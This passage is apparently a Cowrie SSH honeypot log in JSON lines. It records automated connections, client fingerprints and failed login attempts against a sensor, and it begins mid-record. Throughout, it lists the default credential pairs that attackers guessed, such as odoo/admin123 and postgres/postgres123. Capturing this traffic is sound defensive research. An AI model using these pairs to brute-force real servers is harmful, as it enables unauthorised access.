h-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:20:28.485836Z","src_ip":"212.227.235.229","session":"603a1ea73e69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55090,"dst_ip":"1.2.3.4","dst_port":22,"session":"95d83a407fbf","protocol":"ssh","message":"New connection: 212.227.235.229:55090 (1.2.3.4:22) [session: 95d83a407fbf]","sensor":"my-vps","timestamp":"2025-08-31T04:20:28.493483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:20:29.216153Z","src_ip":"212.227.235.229","session":"95d83a407fbf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:20:29.238946Z","src_ip":"212.227.235.229","session":"95d83a407fbf"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"admin123","message":"login attempt [odoo/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:20:35.159481Z","src_ip":"212.227.235.229","session":"95d83a407fbf"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:20:36.930512Z","src_ip":"212.227.235.229","session":"95d83a407fbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44870,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c5b9fae2ddd","protocol":"ssh","message":"New connection: 212.227.125.160:44870 (1.2.3.4:22) [session: 9c5b9fae2ddd]","sensor":"my-vps","timestamp":"2025-08-31T04:20:49.203045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:20:49.777282Z","src_ip":"212.227.125.160","session":"9c5b9fae2ddd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:20:49.777964Z","src_ip":"212.227.125.160","session":"9c5b9fae2ddd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44386,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef091a50460c","protocol":"ssh","message":"New connection: 212.227.125.160:44386 (1.2.3.4:22) [session: ef091a50460c]","sensor":"my-vps","timestamp":"2025-08-31T04:20:51.611442Z"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"admin123","message":"login attempt [odoo/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:20:52.322206Z","src_ip":"212.227.125.160","session":"9c5b9fae2ddd"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:20:53.757101Z","src_ip":"212.227.125.160","session":"9c5b9fae2ddd"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:21:21.027380Z","src_ip":"212.227.235.229","session":"603a1ea73e69"}
{"eventid":"cowrie.session.closed","duration":"31.8","message":"Connection lost after 31.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:21:23.375976Z","src_ip":"212.227.125.160","session":"ef091a50460c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32946,"dst_ip":"1.2.3.4","dst_port":22,"session":"47b4895c7596","protocol":"ssh","message":"New connection: 212.227.235.229:32946 (1.2.3.4:22) [session: 47b4895c7596]","sensor":"my-vps","timestamp":"2025-08-31T04:21:26.339261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:21:27.373114Z","src_ip":"212.227.235.229","session":"47b4895c7596"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:21:27.373786Z","src_ip":"212.227.235.229","session":"47b4895c7596"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41818,"dst_ip":"1.2.3.4","dst_port":22,"session":"c20329ba8e7f","protocol":"ssh","message":"New connection: 212.227.235.229:41818 (1.2.3.4:22) [session: c20329ba8e7f]","sensor":"my-vps","timestamp":"2025-08-31T04:21:29.571698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:21:29.573632Z","src_ip":"212.227.235.229","session":"c20329ba8e7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:21:29.889749Z","src_ip":"212.227.235.229","session":"c20329ba8e7f"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Password@123","message":"login attempt [ubuntu/Password@123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:21:31.188660Z","src_ip":"212.227.235.229","session":"c20329ba8e7f"}
{"eventid":"cowrie.session.closed","duration":"71.7","message":"Connection lost after 71.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:21:32.320947Z","src_ip":"212.227.235.229","session":"603a1ea73e69"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:21:32.505459Z","src_ip":"212.227.235.229","session":"c20329ba8e7f"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"root123","message":"login attempt [odoo/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:21:32.809245Z","src_ip":"212.227.235.229","session":"47b4895c7596"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:21:34.631695Z","src_ip":"212.227.235.229","session":"47b4895c7596"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59542,"dst_ip":"1.2.3.4","dst_port":22,"session":"817f4f66125f","protocol":"ssh","message":"New connection: 212.227.235.229:59542 (1.2.3.4:22) [session: 817f4f66125f]","sensor":"my-vps","timestamp":"2025-08-31T04:21:35.772847Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.245.23","src_port":42598,"dst_ip":"1.2.3.4","dst_port":22,"session":"8029e1415871","protocol":"ssh","message":"New connection: 77.83.245.23:42598 (1.2.3.4:22) [session: 8029e1415871]","sensor":"my-vps","timestamp":"2025-08-31T04:21:40.798481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:21:40.809169Z","src_ip":"77.83.245.23","session":"8029e1415871"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-31T04:21:40.862696Z","src_ip":"77.83.245.23","session":"8029e1415871"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:21:41.041300Z","src_ip":"77.83.245.23","session":"8029e1415871"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:21:44.015986Z","src_ip":"212.227.235.229","session":"817f4f66125f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:21:44.016927Z","src_ip":"212.227.235.229","session":"817f4f66125f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51430,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6a639644b75","protocol":"ssh","message":"New connection: 212.227.125.160:51430 (1.2.3.4:22) [session: e6a639644b75]","sensor":"my-vps","timestamp":"2025-08-31T04:21:47.953012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:21:48.341794Z","src_ip":"212.227.125.160","session":"e6a639644b75"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:21:48.342476Z","src_ip":"212.227.125.160","session":"e6a639644b75"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"root123","message":"login attempt [odoo/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:21:50.725399Z","src_ip":"212.227.125.160","session":"e6a639644b75"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:21:52.426943Z","src_ip":"212.227.125.160","session":"e6a639644b75"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:22:16.026300Z","src_ip":"212.227.235.229","session":"817f4f66125f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58326,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfcafe64c1d0","protocol":"ssh","message":"New connection: 212.227.125.160:58326 (1.2.3.4:22) [session: dfcafe64c1d0]","sensor":"my-vps","timestamp":"2025-08-31T04:22:21.055140Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40798,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1adfce962e6","protocol":"ssh","message":"New connection: 212.227.235.229:40798 (1.2.3.4:22) [session: b1adfce962e6]","sensor":"my-vps","timestamp":"2025-08-31T04:22:25.817203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:22:26.951940Z","src_ip":"212.227.235.229","session":"b1adfce962e6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:22:26.952606Z","src_ip":"212.227.235.229","session":"b1adfce962e6"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"P@ssw0rd123","message":"login attempt [odoo/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:22:32.315278Z","src_ip":"212.227.235.229","session":"b1adfce962e6"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:22:34.143292Z","src_ip":"212.227.235.229","session":"b1adfce962e6"}
{"eventid":"cowrie.session.closed","duration":"59.2","message":"Connection lost after 59.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:22:34.992122Z","src_ip":"212.227.235.229","session":"817f4f66125f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:22:39.747518Z","src_ip":"212.227.125.160","session":"dfcafe64c1d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:22:39.748408Z","src_ip":"212.227.125.160","session":"dfcafe64c1d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55792,"dst_ip":"1.2.3.4","dst_port":22,"session":"558acac073b3","protocol":"ssh","message":"New connection: 212.227.235.229:55792 (1.2.3.4:22) [session: 558acac073b3]","sensor":"my-vps","timestamp":"2025-08-31T04:22:41.208567Z"}
